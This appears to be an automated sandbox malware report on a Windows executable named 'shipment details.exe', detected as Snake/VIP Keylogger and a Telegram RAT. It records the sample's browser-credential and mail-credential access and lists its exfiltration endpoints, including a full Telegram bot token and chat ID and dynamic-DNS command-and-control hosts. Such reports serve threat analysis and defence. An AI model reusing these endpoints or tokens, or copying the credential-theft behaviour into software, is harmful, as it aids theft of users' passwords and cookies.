Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Users\user\Desktop\shipment details.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\shipment details.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\shipment details.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
shipment details.exe	37%	ReversingLabs	Win32.Spyware.Snakekeylogger
shipment details.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	false	unknown
56.163.245.4.in-addr.arpa	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	shipment details.exe, 00000001.00000002.4520239872.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20a	shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	shipment details.exe, 00000001.00000002.4520239872.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135	shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://api.telegram.org	shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F44000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1529185
Start date and time:	2024-10-08 18:20:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	shipment details.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 81 Number of non-executed functions: 16
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: shipment details.exe

Simulations

Behavior and APIs

Time	Type	Description
12:21:06	API Interceptor	11766902x Sleep call for process: shipment details.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse
	JBybSK0HzG.exe	Get hash	malicious	AgentTesla	Browse
	05NN8zSK04.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	OYIZolitxJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	bYXVK2sdmF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	AeOv2Ar7h5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	83pkjaRlqu.exe	Get hash	malicious	AgentTesla	Browse
188.114.97.3	scan_374783.js	Get hash	malicious	AgentTesla	Browse	paste.ee/d/gvOd3
	IRYzGMMbSw.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/yuvr/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	http://www.thegulfthermale.com.tr/antai/12/3dsec.php	Get hash	malicious	Unknown	Browse	www.thegulfthermale.com.tr/antai/12/3dsec.php
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/MlZtCPkK/download
	https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2	Get hash	malicious	HTMLPhisher	Browse	mairie-espondeilhan.com/
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/758bYd86/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download
158.101.44.242	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	OYIZolitxJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	bYXVK2sdmF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	AeOv2Ar7h5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	eGBOY15aNx.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	103_25IBOT242790502_725597355.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO-009 Compurent.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rPedidoactualizado.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Justificante de pago.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	FACTURAS 2024-665.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	05NN8zSK04.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	OYIZolitxJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	bYXVK2sdmF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	AeOv2Ar7h5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	CXWCXZOzGM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	FACTURAS 2024-665.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	05NN8zSK04.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	OYIZolitxJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	bYXVK2sdmF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	AeOv2Ar7h5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	CXWCXZOzGM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
